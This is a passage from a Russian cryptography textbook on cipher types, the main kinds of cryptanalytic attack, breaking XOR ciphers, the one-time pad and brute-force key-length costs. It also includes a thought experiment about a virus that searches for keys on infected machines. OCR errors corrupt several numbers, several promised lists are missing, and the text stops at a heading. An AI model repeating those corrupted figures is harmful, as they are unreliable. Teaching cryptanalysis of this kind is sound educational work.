Алгоритмы шифрования с открытым ключом, также называемые асимметричными алгоритмами шифрования, устроены так, что ключ, используемый для шифрования сообщений, отличается от ключа, применяемого для их расшифрования. Более того, ключ расшифрования не может быть за обозримое время вычислен , ходя из ключа шифрования. Свое название алгоритмы с открытым ключом получили благодаря тому, что ключ шифрования не требуемся держать в тайне. Любой может им воспользоваться, чтобы зашифровать свое сообщение, но только обладатель соответствующего секретного ключа расшифрования будет в состоянии прочесть это шифрованное сообщение. Ключ шифрования обычно называют открытым ключом, а ключ расшифрования — тайным ключом. Иногда тайный ключ называют также секретным, однако чтобы избежать путаницы с симметричными алгоритмами, это название не будет использоваться при дальнейшем изложении.
Несмотря на юг факт, что сообщения шифруются с помощью открытого ключа, а расшифровываются с помощью тайного ключа, процесс шифрования и расшифрования все равно записывается так:
Е k (Р) - С
D к (С) = Р
Иногда сообщения шифруются с использованием тайного ключа, а расшифровываются посредством открытого ключа. Несмотря на возможную путаницу, этот факт математически по-прежнему выражается в виде:
Е к (Р) = С
D k (C) = Р
Криптоаналитические атаки
Криптография ставит своей целью сохранение переписки в тайне от посторонних людей, которые захотят с ней ознакомиться. Таких людей криптографы называют злоумышленниками, противниками, перехватчиками или просто врагами. При этом предполагается, что они могут перехватывать любые сообщения, которыми обмениваются отправитель и получатель.
Криптоанализ заключается в получении доступа к открытому тексту шифрованного сообщения. В ходе успешного криптоаналитического исследования криптосистемы может быть найден не только открытый текст, но и сам ключ. Криптоаналитик занимается поисками слабостей в криптосистеме, которые могут позволить ему прочесть шифрованное сообщение, или отыскать ключ, или и то, и другое вместе. Если противник узнал ключ не с помощью криптоанализа, а каким-то другим способом (выкрал или купил), то говорят, что ключ был скомпрометирован.
Попытка криптоанализа называется атакой. Успешная криптоаналитическая атака зовется взломом, или вскрытием.
В современной криптологии принято считать, что надежность шифра определяется только секретностью используемого ключа. Правило, впервые сформулированное голландцем А. Керкхоффом (1835—1903), гласит о том, что весь механизм шифрования, за исключением значения ключа, предположительно известен противнику. Это предположение является довольно естественным. Например, хотя ФАПСИ вряд ли знакомит АНБ со своими криптографическими алгоритмами, какое-то представление о них там вес равно имеется. Следовательно, правило Керкхоффа является относительно хорошим допущением при рассмотрении надежности алгоритмов шифрования. Если шифр невозможно взломать, зная абсолютно все детали алгоритма шифрования, значит это тем более нельзя сделать, не обладая подобными знаниями во всей их полноте.
Известны 4 основных типа криптоаналитических атак. При рассмотрении каждой из них подразумевается, что криптоаналитик в курсе всех детален подвергаемого криптоанализу алгоритма шифрования.
1. Атака со знанием только шифртекста. В распоряжении криптоанадитпка имеются несколько сообщений, которые были зашифрованы с использованием одного и того же алгоритма шифрования. Задача криптоаналитика состоит в нахождении открытого текста наибольшего числа перехваченных сообщений. Он может также попытаться найти ключи, которые применялись для шифрования этих сообщений, чтобы потом прочесть другие сообщения, зашифрованные с использованием тех же ключей.
Дано:
С 1 = E k1 (P 1 ), С 2 = E k2 (P 2 ),..., С i = E ki (P i ).
Найти:
P 1 , P 2 , ..., Р i или К 1 , К 2 , ..., K i .
2. Атака со знанием открытого текста. Криптоаналитик имеет доступ не только к шифрованным текстам нескольких сообщений, но и знает их открытые тексты. От него требуется найти ключи, которые использовались для шифрования этих сообщений.
Дано:
P 1 , C 1 = E k1 (P 1 ), P 2 , C 2 = E k2 (P 2 ),..., P i , C i = E ki (P i ).
Найти:
K 1 , K 2 , . . , K i .
3. Атака с выбранным открытым текстом. Криптоаналитик не только знает шифрованные и открытые тексты нескольких сообщений, но и может определять содержание этих сообщений. Данная разновидность крипто-аналитической атаки является более мощной по сравнению с атакой со знанием открытого текста, поскольку здесь криптоаналитик может по своему усмотрению выбирать открытый текст, подлежащий зашифрованию, и, тем самым, получать больше информации об используемых ключах. Его задача по-прежнему состоит в нахождении ключей.
Дано:
P 1 , C 1 = E k 1 (P 1 ), P 2 , C 2 = E k 2 (P 2 ),..., P i ,
где С i = Е к i ( P i ), где P 1 , P 2 ,. . . , Pi выбраны криптоаналитиком.
Найти: К 1 , К 2 , . . . , K i .
4. Адаптивная атака с выбранным открытым текстом. Эта атака является разновидностью атаки с выбранным открытым текстом. Криптоаналитик не только выбирает открытые тексты посылаемых шифрованных сообщений, но и может менять свой выбор в зависимости от результатов их шифрования.
Имеются по крайней мере еще 3 разновидности криптоаналитических атак.
1. Атака с выбранным шифртекстом. Криптоаналитику предоставлена возможность выбора шифртекстов, подлежащих расшифрованию получателем. Он также имеет доступ к соответствующим открытым текстам. Требуется найти ключи.
Дано:
С 1 , P 1 = D k1 ( C 1 ) , С 2 , P 2 = D k2 ( C 2 ) , ..., С i , P i = D ki ( C i ).
Найти :
K 1 , K 2, . . . , K i . Этой криптоаналитической атаке, как правило, подвергаются алгоритмы шифрования с открытым ключом. Хотя иногда она эффективна и против симметричных криптосистем. Атаку с выбранным открытым текстом и с выбранным шифртектом называют атакой с выбранным текстом.
2. Атака с выбранным ключом. В ходе этой атаки криптоаналитик обладает некоторыми знаниями относительно правил, по которым отправитель и получатель сообщений выбирают ключи шифрования.
3. Атака с применением грубой силы. Криптоаналитик занимается подкупом, шантажом или пытками, чтобы получить сведения, необходимые ему для взлома криптосистемы. Подкуп иногда выделяют в отдельную категорию и называют атакой с покупкой ключа. Эти атаки являются очень эффективными и зачастую предоставляют наиболее легкий путь для получении доступа к открытым текстам шифрованных сообщений.
Атаки со знанием открытого текста и с выбранным открытым текстом не так уж редко встречаются на практике, как можно подумать. Известны случаи, когда криптоаналитику удавалось подкупить шифровальщика, чтобы он зашифровал сообщение, открытый текст которого известен криптоаналитику. Иногда даже не требуется никого подкупать, поскольку открытые тексты многих сообщений начинаются и заканчиваются стандартными фразами.
С этой точки зрения зашифрованная программа на языке С особенно уязвима, поскольку содержит множество зарезервированных слов типа # define, # include, if, then и do.
Не следует забывать и о правиле Керкхоффа. Попытка добиться высоко-надежности криптографического алгоритма за счет сохранения в тайне принципов его работы является малопродуктивной. Криптоаналитпк может выполнить дизассемблирование любой сверхсложной программы шифрования и методом обратного проектирования воспроизвести алгоритм, положенный в основу ее функционирования. Такое случается довольно част. Лучшие алгоритмы шифрования являются общественным достоянием уже в течение многих лет, и над их взломом продолжают безуспешно трудиться самые способные криптоаналитики в мире.
Надежность алгоритма шифрования
Различные криптографические алгоритмы обладают разной надежностью, чаще называемой стойкостью алгоритма шифрования или стойкостью шифра. Стойкость зависит от того, насколько легко криптоаналитик может взломам, шифр. Если при этом стоимость затрат превышает ценность полученной в 4 результате информации, то владельцу этого шифра, возможно, и беспокоиться не о чем. Если время, потраченное на взлом шифра, больше, чем период, и течение которого ваши данные должны храниться в секрете, то они вероятно вне опасности. Если противник не накопил достаточного количества ваших сообщений, зашифрованных с помощью одного ключа, чтобы суметь определить этот ключ, время его менять, может быть, еще и не пришло.
Слова "может быть", "вероятно" и "возможно" употреблены здесь не зря. Ведь всегда существует шанс, что в криптоанализе произойдут революционные изменения. Свести к минимуму вредные последствия очередного такого прорыва поможет соблюдение простого правила: ценность секретных данных должна быть всегда ниже, чем стоимость преодоления защитных средств, используемых для сохранения этих данных в тайне.
Под вскрытием (взломом) шифра обычно понимается решение одной из перечисленных ниже задач:
Криптографический алгоритм называется безусловно стойким, если вне зависимости от того каким объемом перехваченного шифртекста располагает криптоаналитик, у него нет достаточной информации, чтобы восстановить исходный открытый текст. Существует всего один безусловно стойкий шифр (о нем речь пойдет ниже). Все остальные шифры можно вскрыть с помощью атаки со знанием только шифртекста: достаточно перебрать все возможные ключи и проверить, имеет ли смысл открытый текст, полученный с их помощью.
Сложность криптоаналитической атаки
Сложность криптоаналитической атаки на алгоритм шифрования может быть охарактеризована с помощью трех величин:
Часто под сложностью криптоаналитической атаки понимается максимальная среди этих величин. А для некоторых атак приходится искать компромисс между сложностью по данным, вычислительной сложностью и сложностью по памяти. Например, для реализации более быстрой атаки может потребоваться дополнительная память.
Сложность криптоаналитической атаки, как правило, выражается в виде экспоненциальной функции. К примеру, если атака имеет сложность 2 128 , то это значит, что для взлома шифра требуется выполнить 2 128 операций.
При оценке сложности атаки часто приходится оперировать очень большими числами. Чтобы было понятно, насколько они велики, в табл. 5.1 для них приведены некоторые физические аналогии.
Таблица 5.1. Физические аналогии для очень больших чисел
Физическая аналогия |
Число |
Время, оставшееся до наступления следующего ледникового периода |
16-10 3 (2 14 ) лет |
Время, оставшееся до превращения Солнца в новую звезду |
10 9 (2 30 ) лет |
Возраст Земли |
10 9 (2 30 ) лет |
Возраст Вселенной |
10 10 (2 32 ) лет |
Количество атомов, из которых состоит Земля |
10 51 (2 170 ) |
Количество атомов, из которых состоит Солнце | 10 57 (2 190 ) |
Количество атомов, из которых состоит наша Галактика | 10 67 (2 223 ) |
Количество атомов, из которых состоит Вселенная | 10 77 (2 265 ) |
Объем Вселенной | 10 84 (2 280 )см 3 |
В то время как сложность атаки на данный алгоритм шифрования является постоянной величиной (по крайней мере, до тех пор, пока криптоаналитик не придумает более эффективный метод взлома), вычислительная мощь современных компьютеров растет буквально не по дням, а по часам. Такой феноменальный рост наблюдается в течение последних пятидесяти лет, и есть все основания полагать, что в ближайшее время данная тенденция сохранится. Большинство криптоаналитических атак идеально подходят для реализации на параллельных компьютерах: полномасштабная атака на шифр разбивается на миллионы крошечных атак, которые ведутся независимо друг от друга и, следовательно, не требуют организации взаимодействия между процессорами. Поэтому в корне неверно заявлять о достаточной вычислительной стойкости алгоритма шифрования только потому, что его невозможно взломать при современном уровне развития технологии. Хорошая криптосистема всегда проектируется с достаточным запасом на будущее.
При этом необходимо принимать во внимание прогнозируемый рост компьютерной производительности, чтобы алгоритм шифрования оставался вычислительно стойким в течение многих лет.
Шифры замены и перестановки
Шифры появились на свет задолго до изобретения компьютера. Получившие широкое распространение криптографические алгоритмы выполняли либо замену одних букв на другие, либо переставляли буквы друг с другом. Самые стойкие шифры делали одновременно и то, и другое, причем многократно.
Шифры замены
Шифром замены называется алгоритм шифрования, который производит замену каждой буквы открытого текста на какой-то символ шифрованного текста. Получатель сообщения расшифровывает его путем обратной замены.
В классической криптографии различают 4 разновидности шифров замены:
Примером шифра простой замены может служить программа ROT13, которую обычно можно найти в операционной системе UNIX. С ее помощью буква "А" открытого текста на английском языке заменяется на букву "N", "В" — на "О" и так далее. Таким образом, ROT13 циклически сдвигает каждую букву английского алфавита на 13 позиций вправо. Чтобы получить исходный открытый текст надо применить функцию шифрования ROT 13 дважды:
Р = ROT13(ROT13(P))
Все упомянутые шифры замены легко взламываются с использованием современных компьютеров, поскольку замена недостаточно хорошо маскирует стандартные частоты встречаемости букв в открытом тексте.
Разновидностью шифра замены можно считать код, который вместо букв осуществляет замену слов, фраз и даже целых предложений. Например, кодовый текст "ЛЕДЕНЕЦ" может соответствовать фразе открытого текста "ПОВЕРНУТЬ ВПРАВО НА 90°". Однако коды применимы только при определенных условиях: если, например, в коде отсутствует соответствующее значение для слова "МУРАВЬЕД", то вы не можете использовать это слово в открытом тексте своего сообщения, предназначенном для кодирования.
Шифры перестановки
В шифре перестановки буквы открытого текста не замещаются на другие, а меняется сам порядок их следования. Например, в шифре простой колонной перестановки исходный открытый текст записывается построчно (число букв в строке фиксировано), а шифртекст получается считыванием букв по колонкам. Расшифрование производится аналогично: шифртекст записывается поколонно, а открытый текст можно затем прочесть по горизонтали.
Для повышения стойкости полученный шифртекст можно подать на вход второго шифра перестановки. Существуют еще более сложные шифры перестановки, однако почти все они легко взламываются с помощью компьютера.
Хотя во многих современных криптографических алгоритмах и используется перестановка, ее применение ограничено узкими рамками, поскольку в этом случае требуется память большого объема, а также накладываются ограничения на длину шифруемых сообщений. Замена получила значительно большее распространение.
Роторные машины
В 20-е годы были изобретены разнообразные механические устройства призванные автоматизировать процесс шифрования и расшифрования. Большинство из них состояло из клавиатуры для ввода открытого текста набора роторов — специальных вращающихся колес, каждое из которых реализовывало простую замену. Например, ротор мог заменять "А" на "Ф". "Б" на "У", "С" на "Л" и т. д. При этом выходные контакты одного ротора подсоединялись к входным контактам следующего за ним.
Тогда, например, если на клавиатуре 4-роторной машины нажималась клавиша "А", то первый ротор мог превратить ее в "Ф", которая, пройдя через второй ротор, могла стать буквой "Т", которую третий ротор мог заменить на букву "К", которая могла быть преобразована четвертым ротором в букву "F" шифртекста. После этого роторы поворачивались, и в следующий раз заме на была иной. Чтобы сбить с толку криптоаналитиков, роторы вращались с разной скоростью.
Наиболее известной роторной машиной стала немецкая "Энигма", которую Германия использовала для засекречивания своей переписки во время Второй мировой войны.
Операция сложения по модулю 2
Операция сложения по модулю 2, которая в языке программирования С обозначается знаком ^ , а в математике — знаком Å , представляет собой стандартную операцию над битами:
0 Å 0 = 0
0 Å 1 = 1
1 Å 0 = 1
1 Å 1 = 0
С помощью сложения по модулю 2 можно выполнять многоалфавитную замену, прибавляя к битам ключа соответствующие биты открытого текста. Этот алгоритм шифрования является симметричным. Поскольку двойное прибавление одной и той же величины по модулю 2 восстанавливает исходное значение, шифрование и расшифрование выполняются одной и тон же программой.
К сожалению, данный алгоритм обладает очень слабой стойкостью. Тем не менее АНБ одобрило его использование в цифровых сотовых телефонах американских производителей для засекречивания речевых переговоров. Он также часто встречается в различных коммерческих программных продуктах.
Следует помнить, что с помощью данного алгоритма вы можете надежно спрятать от человека, не сведущего в криптоанализе, содержание своей переписки, однако опытному криптоаналитику понадобится всего несколько минут, чтобы его взломать. Делается это очень просто, если предположить. например, что открытый текст сообщения написан на английском языке.
1. Сначала следует определить длину ключа. Шифртекст последовательно складывается по модулю 2 со своей копией, сдвинутой на различное число байт, и в полученном векторе подсчитывается число совпадающих компонентов. Когда величина сдвига кратна длине ключа, это число превысит 6% от общей длины исследуемого шифртекста. Если не кратна, то совпадений будет меньше 0,4%. Проанализировав полученные данные, можно сделать обоснованный вывод о длине ключа.
2. Затем надо сложить шифртекст по модулю 2 со своей копией, сдвинутой на величину длины ключа. Эта операция аннулирует ключ и оставит в наличии открытый текст сообщения, сложенный по модулю 2 со своей копией, сдвинутой на величину длины ключа.
Хотите верьте, хотите нет, но на самом деле все-таки существует алгоритм шифрования, который невозможно вскрыть. Зовется он одноразовым блокнотом. В классическом виде одноразовый блокнот представляет собой очень длинную последовательность случайных букв, записанную на листах бумаги, которые скреплены между собой в блокнот. Отправитель использует каждую букву из блокнота, чтобы зашифровать ровно одну букву открытого текста сообщения. Шифрование состоит в сложении буквы открытого текста и буквы из одноразового блокнота по модулю N, где N — количество букв в алфавите. После зашифрования отправитель уничтожает использованный одноразовый блокнот. Чтобы отправить новое сообщение, ему придется изготовить или найти новый одноразовый блокнот.
Получатель, владеющий копией одноразового блокнота, которым воспользовался отправитель сообщения, получает открытый текст путем сложения букв шифртекста и букв, извлеченных из имеющейся у него копии одноразового блокнота. Эту копию он затем уничтожает.
Если предположить, что у криптоаналитика нет доступа к одноразовому блокноту, данный алгоритм шифрования абсолютно надежен. Перехваченному шифрованному сообщению с одинаковой вероятностью соответствует произвольный открытый текст той же длины, что и сообщение.
Однако у алгоритма шифрования с помощью одноразового блокнота есть весьма существенный недостаток. Последовательность букв, которая содержится в одноразовом блокноте, должна быть по-настоящему случайной, а не просто псевдослучайной, поскольку любая криптоаналитическая атака на него будет, в первую очередь, направлена против метода генерации содержимого этого блокнота.
Другая важная особенность применения одноразового блокнота состоит в том, чтобы никогда не пользоваться им дважды, поскольку криптоанадитпк может отыскать участки сообщений, для шифрования которых был применен один и тот же одноразовый блокнот. Делается это следующим образом. Нужно последовательно сдвигать одно сообщение относительно другою и подсчитывать количество совпадений. Как только это количество резко увеличится, значит, случайная последовательность, использованная для зашифрования двух различных отрезков сообщений, была одной и той же. Дальнейший криптоанализ осуществляется достаточно просто.
Одноразовые блокноты могут состоять не из байтов, а из битов. Тогда шифрование будет заключаться в выполнении сложения по модулю 2. Для получения открытого текста достаточно опять сложить по модулю 2 шифртекст и содержимое одноразового блокнота. Надежность будет по-прежнему такой же, как при посимвольном модульном сложении.
Еще один недостаток блокнотного способа шифрования заключается в том, что случайная последовательность должна быть той же длины, что и само сообщение. Чтобы послать короткую шифровку резиденту, одноразовый блокнот еще сгодится, но как быть с каналом связи, пропускная способность которого измеряется десятками мегабит в секунду?
Конечно, при необходимости можно для хранения случайных последовательностей воспользоваться компакт-дисками с многократной перезаписью или цифровой магнитной лентой. Однако это будет достаточно дорогостоящее решение проблемы. Кроме того, необходимо будет обеспечить синхронную работу приемной и передающей аппаратуры, а также отсутствие искажений при передаче. Ведь даже если несколько бит сообщения пропущены при его пересдаче, получатель так и не сможет прочесть открытый текст.
Несмотря на все перечисленные выше недостатки, в настоящее время одноразовые блокноты активно используются для шифрования сверхсекретных сообщений. Не имея в своем распоряжении соответствующего блокнота, эти сообщения невозможно прочитать вне зависимости от того, насколько быстро работают суперкомпьютеры, которые используются в ходе криптоана-литической атаки. Даже инопланетные пришельцы со своими сверхсветовыми звездолетами и чудо-компьютерами не смогут их прочесть, если. конечно, не вернутся в прошлое на машине времени и не добудут одноразовые блокноты, использованные для шифрования этих сообщений.
Существует великое множество алгоритмов шифрования, придуманных специально в расчете на реализацию в виде компьютерных программ. Среди наиболее известных можно упомянуть:
Глава 6. Криптографические ключи
Длина секретного ключа
Надежность симметричной криптосистемы зависит от стойкости используемого криптографического алгоритма и от длины секретного ключа. Допустим, что сам алгоритм идеален — вскрыть его можно только путем опробования всех возможных ключей. Этот вид криптоаналитической атаки называется методом тотального перебора. Чтобы применить данный метол, криптоаналитику понадобится немного шифртекста и соответствующий открытый текст. Например, в случае блочного шифра ему достаточно получить в свое распоряжение по одному блоку шифрованного и соответствующего открытого текста. Сделать это не так уж и трудно.
Криптоаналитик может заранее узнать содержание сообщения, а затем перехватить его при передаче в зашифрованном виде. По некоторым признакам он также может догадаться, что посланное сообщение представляет собой не что иное, как текстовый файл, подготовленный с помощью распространенного редактора, компьютерное изображение в стандартном формате, каталог файловой подсистемы или базу данных. Для криптоаналитика важно то, что в каждом из этих случаев в открытом тексте перехваченного шифрсообщения известны несколько байтов, которых ему хватит, чтобы предпринять атаку со знанием открытого текста.
Подсчитать сложность атаки методом тотального перебора достаточно просто. Если ключ имеет длину 64 бита, то суперкомпьютер, который может опробовать 1 млн ключей за 1 с, потратит более 5 тыс. лет на проверку всех возможных ключей. При увеличении длины ключа до 12cS бит, этому же суперкомпьютеру понадобится 10 25 лет, чтобы перебрать все ключи. Вселенная существует всего-навсего 10'° лет, поэтому можно сказать, что 10- — это достаточно большой запас надежности для тех, кто пользуется 128-5ишымп ключами.
Однако прежде чем броситься спешно изобретать криптосистему с длиной ключа в 4 Кбайт, следует вспомнить о сделанном выше предположении, а именно: используемый алгоритм шифрования идеален в том смысле, что вскрыть его можно только методом тотального перебора. Убедиться в этом на практике бывает не так просто, как может показаться на первый взгляд. Криптография требует утонченности и терпения. Новые сверхсложные криптосистемы при более внимательном рассмотрении зачастую оказываются очень нестойкими. А внесение даже крошечных изменений в стойкий криптографический алгоритм может существенно понизить его стойкость. Поэтому надо пользоваться только проверенными шифрами, которые известны уже в течение многих лет, и не бояться проявлять болезненную подозрительность по отношению к новейшим алгоритмам шифрования, вне зависимости от заявлений их авторов об абсолютной надежности этих алгоритмов.
Важно также не забывать о правиле Керкхоффа: стойкость алгоритма шифрования должна определяться ключом, а не деталями самого алгоритма. Чтобы быть уверенным в стойкости используемого шифра, недостаточно проанализировать его при условии, что противник досконально знаком с алгоритмом шифрования. Нужно еще и рассмотреть атаку на этот алгоритм, при которой враг может получить любое количество шифрованного и соответствующего открытого текста. Более того, для повышения надежности следует предположить, что криптоаналитик имеет возможность организовать атаку с выбранным открытым текстом произвольной длины.
К счастью, в реальной жизни большинство людей, интересующихся содержанием ваших шифрованных файлов, не обладают квалификацией высококлассных специалистов и вычислительными ресурсами, которые имеются в распоряжении правительств мировых супердержав. Последние же вряд ли будут тратить время и деньги, чтобы прочесть ваше пылкое сугубо личное послание. Однако, если вы планируете свергнуть "антинародное правительство", вам необходимо всерьез задуматься о стойкости применяемого алгоритма шифрования.
Сложность и стоимость атаки методом тотального перебора
Атака методом тотального перебора, как правило, представляет собой разновидность атаки со знанием открытого текста. Если предположить, что атака методом тотального перебора является наиболее эффективной среди возможных атак на используемый вами симметричный алгоритм шифрования. то ключ должен быть достаточно длинным, чтобы успешно отразить эту атаку. Насколько длинным?
Среди параметров, которые необходимо принимать во внимание при рассмотрении атаки методом тотального перебора, прежде всего, надо упомянуть об общем количестве проверяемых ключей и о времени, затрачиваемом противником на проверку одного ключа. Количество ключей для конкретною алгоритма обычно фиксировано. Например, DES-алгоритм использует 56-битный ключ. Это означает, что его ключевое пространство содержит 2 56 ключей.
Скорость проверки ключей играет менее важную роль, чем их количество. Для простоты изложения можно считать, что вне зависимости от алгоритма шифрования, время, которое требуется на проверку одного ключа, одинаково. На практике данное предположение неверно, и для разных криптографических алгоритмов это время может различаться в десятки раз. Поскольку нашей целью является отыскание такой длины ключа, при которой стойкость алгоритма шифрования против атаки методом тотального перебора в миллионы раз превышает предел, делающий эту атаку неосуществимой на практике, то сделанное нами предположение вполне оправдано.
При решении вопроса о достаточной длине ключа в качестве алгоритма шифрования чаще всего рассматривается DES-алгоритм. В 1977 г. американские криптологи У. Диффи (W.Diffie) и М. Хеллман (M.Hellman) заявили, что при существующем уровне развития компьютерной технологии можно построить специализированный суперкомпьютер для вскрытия ключей DES-алгоритма методом тотального перебора. Имея в своем составе 1 млн микросхем, каждая из которых способна проверять 1 млн ключей в секунду, этот суперкомпьютер перебрал бы все 2 56 ключей за 20 час.
Атака методом тотального перебора идеально подходит для реализации на параллельном суперкомпьютере, состоящем из многих процессоров. Отдельным процессорам, ведущим поиск ключа, нет необходимости устанавливать связь с другими процессорами суперкомпьютера во время выполнения своей части поиска. Следовательно, все процессоры специализированного суперкомпьютера, предназначенного для параллельного поиска ключей, необязательно находятся даже в одном городе, не говоря уже об одном помещении.
В 1993 г. американский криптолог М. Винер (M.Wiener) спроектировал суперкомпьютер для атаки на DES-атгоритм методом тотального перебора. Рассуждения Винера верны не только для DES-алгоритма, но и практически для любого другого алгоритма шифрования. Суперкомпьютер, разработанный Винером, состоит из специализированных микросхем, плат и стоек. По мнению Винера, для того чтобы гарантировать вскрытие 56-битного ключа за 7 час, на изготовление такого суперкомпьютера потребуется не более 1 млн долларов. По закону Мура, вычислительная мощь компьютеров улавливается каждые полтора года. Поэтому к 2001 г. стоимость суперкомпьютера, придуманного Винером, уменьшится в 10 раз и составит всего-навсего 100 тыс. долларов. Это означает, что уже сейчас крупные компании и "крутые" криминальные структуры могут вскрывать 56-битные ключи. Для военных криптоаналитиков в большинстве индустриально развитых стран доступны 64-битные ключи.
В 1996 г. Диффи, Винер и другие авторитетные американские криптологи опубликовали результаты своей исследовательской работы по определению длины ключа, необходимой для адекватной защиты информации от атаки методом тотального перебора (табл. 6.1).
Таблица 6.1. Стоимость и вычислительная сложность атаки методом тотального перебора
Кто атакует | Бюджет | Сложность атаки | Стойкий ключ | |
40 бит | 56 бит | |||
Хакер | 1000 долл. | 1 неделя | Никогда | 45 бит |
Малый бизнес | 10 тыс. долл. | 12 мин. | 556 дней | 64 бита |
Крупная компания | 10 млн долл. | 0.005 с | 6 мин | 70 бит |
Федеральное агентство | 300 млн долл. | 0.0002 с | 12с | 75 бит |
К приведенным в табл. 6.1 цифрам следует относиться с осторожностью. Теоретический расчет затрат на проведение атак методом тотального перебора на криптографические ключи разной длины всегда существенно отличается от того, с чем криптоаналитики сталкиваются на практике при покупке или разработке суперкомпьютеров для ведения такого рода атак. Объясняется это тем, что одни сделанные допущения оказываются весьма далеки от реальности, в то время как другие факторы просто не принимаются во внимание. В данном случае Диффи, Винер и другие посчитали, что при создании специализированного суперкомпьютера для атаки методом тотального перебора будут использоваться заказные микросхемы ценой не более 10 долл. По оценкам АНБ, такие микросхемы стоят, как правило, в 100 раз дороже. У АНБ вызвало сомнение и допущение о том, что вне зависимости от алгоритма шифрования, лишь длина ключа определяет сложность криптоаналитической атаки. Кроме того, при составлении таблицы не были учтены затраты на научно-исследовательские и опытно-конструкторские работы, которые для первого экземпляра суперкомпьютера обычно составляют не менее 10 млн долл. Не были также приняты во внимание расходы на приобретение компьютерной памяти.
Из сказанного можно сделать весьма важный вывод. Если кто-то очень захочет узнать использованный вами ключ, ему нужно всего лишь потратить достаточное количество денег. Поэтому определяющей является стоимость зашифрованной вами информации. Если цена ей в базарный день — около 2 долл., вряд ли кто-то решится потратить 1 млн, чтобы ее заполучить. Но если прибыль от прочтения вашей шифровки составляет 100 млн долл.. — берегитесь! Единственным утешением может послужить тот факт, что с течением времени любая информация очень быстро устаревает и теряет свою ценность.
Программная атака
Без специализированного компьютерного оборудования, ведущего параллельный поиск ключей, атака методом тотального перебора имеет значительно меньше шансов на успех. Однако если вы не припасли лишний миллион долларов, который можно потратить на изготовление такого оборудования, есть другой, более дешевый, способ попытаться вскрыть интересующий вас ключ.
В мире имеется огромное количество компьютеров (по оценкам экспертов, в 1996 г. их число достигло 200 млн), которые, чтобы не простаивать, могли бы опробовать ключи. Эксперимент, проведенный в начале 1997 г., показал, что таким способом за две недели можно вскрыть 48-битный ключ. И хотя этот ключ был найден методом тотального перебора после проверки чуть более половины всех возможных ключей, полученный результат впечатляет, поскольку в ходе атаки одновременно использовались не более 5 тысяч компьютеров из существующих 200 миллионов, а в общей сложности в атаке оказались задействованными лишь 7 тысяч компьютеров.
Основное препятствие на пути к использованию миллионов вычислительных устройств, разбросанных по всему миру, заключается в невозможности сделать так, чтобы их владельцы приняли участие в атаке. Можно, конечно, вежливо попросить каждого из них об услуге, но во-первых, на это уйдет уйма времени, а во-вторых, ответом в большинстве случаев будет, скорее всего, твердое "нет". Можно попытаться тайком проникнуть на чужие компьютеры через сеть, но на это понадобится еще больше времени, да вдобавок вас могут арестовать.
Более разумным представляется создание компьютерного вируса, который вместо того, чтобы стирать файлы с жесткого диска и выдавать на дисплей % глупые сообщения, незаметно для владельца компьютера будет перебирать возможные ключи. Проведенные исследования показывают, что в распоряжении вируса будет от 70 до 90% процессорного времени зараженного им компьютера. После вскрытия ключа вирус может породить новый вирус, содержащий информацию о найденном ключе, и отправить его странствовать по компьютерной сети до тех пор, пока он не доберется до своего хозяина.
При более тонком подходе вирус, обнаруживший ключ, выдаст на экран компьютера информацию вида:
В ВАШЕМ КОМПЬЮТЕРЕ ОБНАРУЖЕНА СЕРЬЕЗНАЯ ОШИБКА!
ПОЖАЛУЙСТА, ПОЗВОНИТЕ ПО ТЕЛЕФОНУ (095)123-45-67
И ЗАЧИТАЙТЕ ОПЕРАТОРУ СЛЕДУЮЩЕЕ 48-БИТОВОЕ ЧИСЛО:
хххххххх ххххххх ххххххх ххххххх ххххххх ххххххх
ПЕРВОМУ, КТО СООБЩИТ ОБ ЭТОЙ ОШИБКЕ, ГАРАНТИРОВАНО
ВОЗНАГРАЖДЕНИЕ В РАЗМЕРЕ 100 (СТА) ДОЛЛАРОВ.
Если вирусу удастся заразить 10 млн компьютеров, каждый из которых станет проверять хотя бы 1 тыс. ключей в секунду, то 56-битный ключ будет найден менее чем через 3 месяца. Дополнительно придется раскошелиться на подкуп производителей антивирусных программ, однако к компьютерной криптографии, о которой сейчас идет речь, эта проблема никакого отношения не имеет.
"Китайская лотерея"
Допустим, что для атаки методом тотального перебора во всякий без исключения китайский радиоприемник и телевизор встраивается специальная микросхема, проверяющая 1 млн ключей в секунду. Каждая из них автоматически перебирает свое подмножество ключей после получения из эфира фрагментов шифрованного и соответствующего открытого текста. Как только правительство Китая пожелает вскрыть какой-нибудь ключ, оно принимает постановление, которое обязывает всех владельцев телевизоров и радиоприемников включить свои аппараты в определенное время, чтобы они могли принять пару фрагментов текста и приступить к перебору ключей.
За найденный ключ полагается значительный приз. Благодаря этому радиоприемники и телевизоры со встроенными микросхемами хорошо раскупаются, а вскрытые ключи своевременно доводятся до сведения китайского правительства. Если учесть, что у каждого из десяти китайцев есть радиоприемник или телевизор, то получится, что на вскрытие 64-битного ключа китайскому правительству потребуется самое большее 43 часа. В табл. 6.2 приведена сложность вскрытия 64-битного ключа с помощью "китайской лотереи" при ее проведении в Китае, а также в США, Ираке и Израиле.
Таблица 6.2. Сложность вскрытия 64-битного ключа с помощью "китайской лотереи"
Страна | Численность населения | Количество телевизоров и радиоприемников | Сложность вскрытия 64-битового ключа с помощью "китайской лотереи" |
Китай
|
1 190 431 000 | 257 000 000 | 43 часа |
США | 260 714 000 | 739 000 000 | 6,9 часов |
Ирак | 19 890 000 | 4 730 000 | 44 дня |
Израиль | 5 051 000 | 3 640 000 | 58 дней |
Биотехнология
Предположим такую ситуацию: с использованием генной инженерии удалось вывести особую породу травоядных динозавров. Их нарекли "криптозаврами", поскольку они состоят из клеток, которые могут проверять криптографические ключи. Шифрованный и соответствующий открытый теки передаются в клетки криптозавра с помощью магнитооптических средин. Найденный ключ выводится специальными клетками, способными перемещаться в пределах тела криптозавра. Поскольку динозавр в среднем состоит из 2 14 клеток, то при условии, что каждая из них успевает проверить 1 миллион ключей в секунду, на поиск 64-битного ключа уйдет не более 1 с.
Для этой же цели можно использовать клетки морских водорослей. Например, на площади в 500 км2 и на глубине в 1 м их можно разместить в количестве 1023. Если каждая из них будет обрабатывать 1 млн ключей в секунду. то 128-битный ключ будет вскрыт менее чем за сотню лет. Шифрованный и открытый тексты передаются водорослям с помощью спутника, а сигналом о нахождении искомого ключа служит изменение окраски водорослей вокруг клетки, отыскавшей этот ключ. За советами по разведению морских водорослей криптоаналитики могут обратиться на биологический факультет ближайшего университета.
Термодинамические ограничения
